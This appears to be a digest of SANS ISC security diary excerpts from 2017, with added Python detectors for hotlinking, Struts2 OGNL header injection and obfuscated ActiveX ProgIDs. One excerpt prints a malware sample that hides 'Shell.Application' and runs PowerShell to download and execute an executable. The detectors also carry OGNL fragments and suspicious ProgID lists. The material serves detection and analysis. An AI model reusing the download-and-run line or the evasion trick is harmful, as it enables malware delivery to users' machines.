Tracking Website Defacers with HTTP Referers, (Fri, Apr 7th)

In a previous diary, I explained how pictures may affect your website's reputation[1]. Although one of the suggested recommendations was to prevent cross-linking by checking the HTTP Referer header, this is a control that I do not implement on my personal blog, purely for research purposes. And it successfully worked! My website and all its components are constantly monitored but …
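As an added example (not code from the diary): the monitoring the text alludes to can be done from ordinary web server logs, by listing successful image requests whose Referer points at a host other than your own. The script below parses lines in the Apache/nginx "combined" format; the site name, the log lines and the host names are all constructed for the demo.

```python
"""Added example (not from the original ISC diary): surface hotlinked images
from web server access logs using the Referer field.
OWN_HOSTS is a placeholder for your own site; SAMPLE_LOG is constructed."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical site name; replace with your own host(s).
OWN_HOSTS = {"blog.example.org", "www.blog.example.org"}
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".svg", ".webp")

# Apache/nginx "combined" log format; only the fields we need are captured.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def referer_host(referer: str) -> Optional[str]:
    """Return the lowercased host of a Referer URL, or None when the header is absent."""
    if not referer or referer == "-":
        return None
    host = urlsplit(referer).hostname
    return host.lower() if host else None


def hotlinks(log_lines):
    """Yield (foreign_referer_host, image_path, client_ip) for every successful
    image request whose Referer names a host that is not ours.
    Requests without a Referer are skipped: browsers omit it on direct visits
    and privacy settings strip it, so its absence proves nothing either way."""
    for line in log_lines:
        m = COMBINED.match(line)
        if not m:
            continue
        if m["status"] != "200" or not m["path"].lower().endswith(IMAGE_EXT):
            continue
        host = referer_host(m["referer"])
        if host is None or host in OWN_HOSTS:
            continue
        yield host, m["path"], m["ip"]


def top_hotlinkers(log_lines, n=5):
    """Count foreign referer hosts so the most active cross-linkers surface first."""
    return Counter(host for host, _, _ in hotlinks(log_lines)).most_common(n)


# Constructed sample log (combined format); IPs and hosts are documentation ranges/placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Apr/2017:10:01:02 +0000] "GET /img/logo.png HTTP/1.1" 200 5123 "http://blog.example.org/post/1" "Mozilla/5.0"',
    '198.51.100.9 - - [07/Apr/2017:10:02:11 +0000] "GET /img/logo.png HTTP/1.1" 200 5123 "http://defaced.example.net/owned.html" "Mozilla/5.0"',
    '198.51.100.10 - - [07/Apr/2017:10:02:40 +0000] "GET /img/banner.jpg HTTP/1.1" 200 9901 "http://defaced.example.net/owned.html" "Mozilla/5.0"',
    '192.0.2.77 - - [07/Apr/2017:10:03:00 +0000] "GET /img/logo.png HTTP/1.1" 200 5123 "-" "curl/7.52"',
    '192.0.2.78 - - [07/Apr/2017:10:03:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://other.example.com/" "Mozilla/5.0"',
    '192.0.2.79 - - [07/Apr/2017:10:04:00 +0000] "GET /img/missing.gif HTTP/1.1" 404 300 "http://other.example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, path, ip in hotlinks(SAMPLE_LOG):
        print(f"{host} embeds {path} (seen from {ip})")
    print(top_hotlinkers(SAMPLE_LOG))
```

The Referer is entirely client-controlled: a scraper can omit or forge it, which is why rejecting cross-linked requests on this basis is a weak enforcement control but still a useful observation channel, as the diary uses it. Treat the listed hosts as leads to verify, not proof of defacement.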

Java Struts2 Vulnerability Used To Install Cerber Crypto Ransomware, (Thu, Apr 6th)

[We do have a special webcast about the Struts2 vulnerability scheduled for 11am ET today. Sign up here] For about a month, we have been tracking numerous attempts to exploit the Java Struts2 vulnerability (CVE-2017-5638). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots. But recently, I saw a number of exploit attempts targeting …
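As an added example (not code from the diary): the public exploits for CVE-2017-5638 deliver an OGNL expression in the Content-Type header, which the Struts2 Jakarta multipart parser evaluates while building an error message; that detail comes from the public advisory and exploit code, not from this diary. The triage below flags raw HTTP requests whose Content-Type carries OGNL markers. The requests are constructed for the demo, and the OGNL fragment is deliberately not a working payload.

```python
"""Added example (not from the original ISC diary): flag HTTP requests whose
Content-Type header carries an OGNL expression, the delivery vector of public
CVE-2017-5638 exploits. SAMPLE_REQUESTS are constructed, not captures."""
import re

# A real media type never contains an OGNL expression opener or Struts internals.
OGNL_MARKERS = re.compile(
    r"[%$]\{"                      # %{ ... } or ${ ... } expression opener
    r"|#_memberAccess"             # sandbox escape used by public payloads
    r"|com\.opensymphony\.xwork2", # Struts2 internals referenced from OGNL
    re.IGNORECASE,
)


def parse_request(raw: str):
    """Split a raw HTTP request head into (request_line, {lowercased-header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_struts_ognl_attempt(raw: str) -> bool:
    """True when the Content-Type header contains OGNL markers.
    Header-name casing is normalised by parse_request, so 'content-type' and
    'Content-Type' are treated alike (HTTP header names are case-insensitive)."""
    _, headers = parse_request(raw)
    return bool(OGNL_MARKERS.search(headers.get("content-type", "")))


def triage(requests):
    """Return (index, request_line) for every request that looks like an attempt."""
    return [(i, parse_request(r)[0]) for i, r in enumerate(requests)
            if is_struts_ognl_attempt(r)]


# Constructed sample traffic; the OGNL text in #2 and #4 is illustrative only.
SAMPLE_REQUESTS = [
    # 1. Normal browser upload: media type plus a boundary parameter.
    "POST /upload.action HTTP/1.1\r\nHost: app.example.org\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    "Content-Length: 1024\r\n\r\n",
    # 2. OGNL expression where a media type belongs (not a working payload).
    "GET / HTTP/1.1\r\nHost: app.example.org\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='whoami')}\r\n\r\n",
    # 3. Ordinary JSON API call.
    "POST /api HTTP/1.1\r\nHost: app.example.org\r\nContent-Type: application/json\r\n\r\n",
    # 4. Same idea with ${ and lowercase header name.
    "POST /index.action HTTP/1.1\r\nHost: app.example.org\r\n"
    "content-type: ${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']}\r\n\r\n",
]

if __name__ == "__main__":
    for idx, request_line in triage(SAMPLE_REQUESTS):
        print(f"request #{idx}: {request_line}")
```

Matching on the expression opener rather than on a specific payload string keeps the rule useful across the many exploit variants seen for this bug; on a real server, feed it the header fields your reverse proxy or WAF logs, since the default access log does not record Content-Type.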

Encryption inside Utility Industrial Control Systems (ICS) communication protocols: a must to preserve the confidentiality of information and reliability of the industrial process, (Tue, Apr 4th)

Industrial control systems are sensitive systems that must make decisions in real time to ensure the operation of the industrial process they govern. Latency and reliability in packet transmission are fundamental: the protocols are connection-oriented, but because speed is the main goal, many of them do not include error recovery schemes other …

IPFire – A Household Multipurpose Security Gateway, (Sun, Apr 2nd)

I have been looking for a while for an inline proxy that is easy to set up and manage, and a co-worker suggested trying IPFire[1]. IPFire is a hardened Linux-based OS compiled from source; a basic installation takes about 15 minutes. Before starting, you need to determine how many interfaces (zones) you need …

Pro & Con of Outsourcing your SOC, (Fri, Mar 31st)

I'm involved in a project to deploy a SIEM (Security Information and Event Management) / SOC (Security Operations Center) for a customer. The current approach is to outsource the services to an external company, also called an MSSP (Managed Security Services Provider). We had an interesting chat about the pros and cons of having an internal or …

Diverting built-in features for the bad, (Thu, Mar 30th)

Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small JavaScript sample with only 2 lines of code (string quoting was lost in the extract and is restored here; the download URL is redacted as in the original, and the tail of the second call was cut off):

    var d=new ActiveXObject("Shell.NormandApplication".replace("Normand", ""));
    d.ShellExecute("PowerShell", "((New-Object System.Net.WebClient).DownloadFile('http://[redacted].exe', 'xwing.pif'));Start-Process 'xwing.pif'", "", "",

There is no real obfuscation here, just a trick to avoid detection of the string "Shell.Application", which is often searched for by automated tools. Sometimes, there …
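As an added example (not code from the diary): a static string match for "Shell.Application" misses the sample above because the ProgID only exists after `.replace()` runs. The normaliser below folds constant `"literal".replace("a","b")` calls and `"a" + "b"` concatenations until the script stops changing, then matches a short list of COM ProgIDs that matter in malware triage. It goes a little beyond the diary's single trick by also handling concatenation; the samples are constructed, the second one mirrors the diary's sample.

```python
"""Added example (not from the original ISC diary): fold constant string
operations in JavaScript so substring matching sees the real COM ProgID.
Samples are constructed; the replace_trick sample mirrors the diary's."""
import re

# One JavaScript string literal, double- or single-quoted; escapes are kept as-is.
STR = r'(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')'
# "lit".replace("old", "new") with all three operands literals (6 groups total).
REPLACE_CALL = re.compile(STR + r'\s*\.replace\(\s*' + STR + r'\s*,\s*' + STR + r'\s*\)')
# "lit" + "lit" (4 groups total).
CONCAT = re.compile(STR + r'\s*\+\s*' + STR)

# ProgIDs worth flagging in a script that should not be touching COM at all.
SUSPICIOUS = ("shell.application", "wscript.shell", "msxml2.xmlhttp", "adodb.stream")


def _lit(m, idx):
    """Content of the idx-th literal (1-based) in a match with two groups per literal."""
    dq, sq = m.group(2 * idx - 1), m.group(2 * idx)
    return dq if dq is not None else sq


def _fold_replace(m):
    # JS String.prototype.replace with a string pattern replaces the FIRST
    # occurrence only, hence count=1 rather than Python's replace-all default.
    return '"%s"' % _lit(m, 1).replace(_lit(m, 2), _lit(m, 3), 1)


def _fold_concat(m):
    return '"%s"' % (_lit(m, 1) + _lit(m, 2))


def normalize(js: str) -> str:
    """Repeat folding until a fixpoint, so chained tricks collapse too."""
    prev = None
    while prev != js:
        prev = js
        js = REPLACE_CALL.sub(_fold_replace, js)
        js = CONCAT.sub(_fold_concat, js)
    return js


def flag(js: str):
    """Suspicious ProgIDs present in the normalised script (lowercase)."""
    low = normalize(js).lower()
    return [s for s in SUSPICIOUS if s in low]


# Constructed samples; no URLs or payloads, only the object creation line.
SAMPLES = {
    "plain": 'var d=new ActiveXObject("Shell.Application");',
    "replace_trick": 'var d=new ActiveXObject("Shell.NormandApplication".replace("Normand",""));',
    "concat_trick": "var d=new ActiveXObject('Shell.' + 'Appli' + 'cation');",
    "chained": 'var d=new ActiveXObject(("WScr" + "ipt.XXShell").replace("XX",""));',
    "benign": 'var greeting = "hello".replace("l","L");',
}

if __name__ == "__main__":
    for name, js in SAMPLES.items():
        print(f"{name:14s} -> {flag(js) or 'clean'}")
```

The normaliser only understands literals: hex or unicode escapes inside strings, `String.fromCharCode`, array joins and `eval` are left alone, which is exactly why sandboxed execution remains the reliable path for anything more than this kind of minimal trick. Note that the "chained" sample's inner parentheses are not folded by these two rules, so it is listed only to show a miss; extend the rules rather than trusting a clean result.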

Critical VMware vulnerabilities disclosed, (Wed, Mar 29th)

VMware released a security bulletin[1] with moderate to critical vulnerabilities. The following products are affected: ESXi, Workstation and Fusion. Depending on the product and version, the vulnerabilities may allow a guest to execute code on the host, cause a denial of service, or leak information. Patches are available. [1] https://www.vmware.com/security/advisories/VMSA-2017-0006.html Xavier Mertens (@xme) ISC Handler – Freelance …

Logical & Physical Security Correlation, (Tue, Mar 28th)

Today, I would like to review an example of how we can improve our daily security operations or, for our users, how to help them detect suspicious content. Last week, I received the following email in my corporate mailbox. The mail is written in French but easy to understand: it is a notification regarding a failed …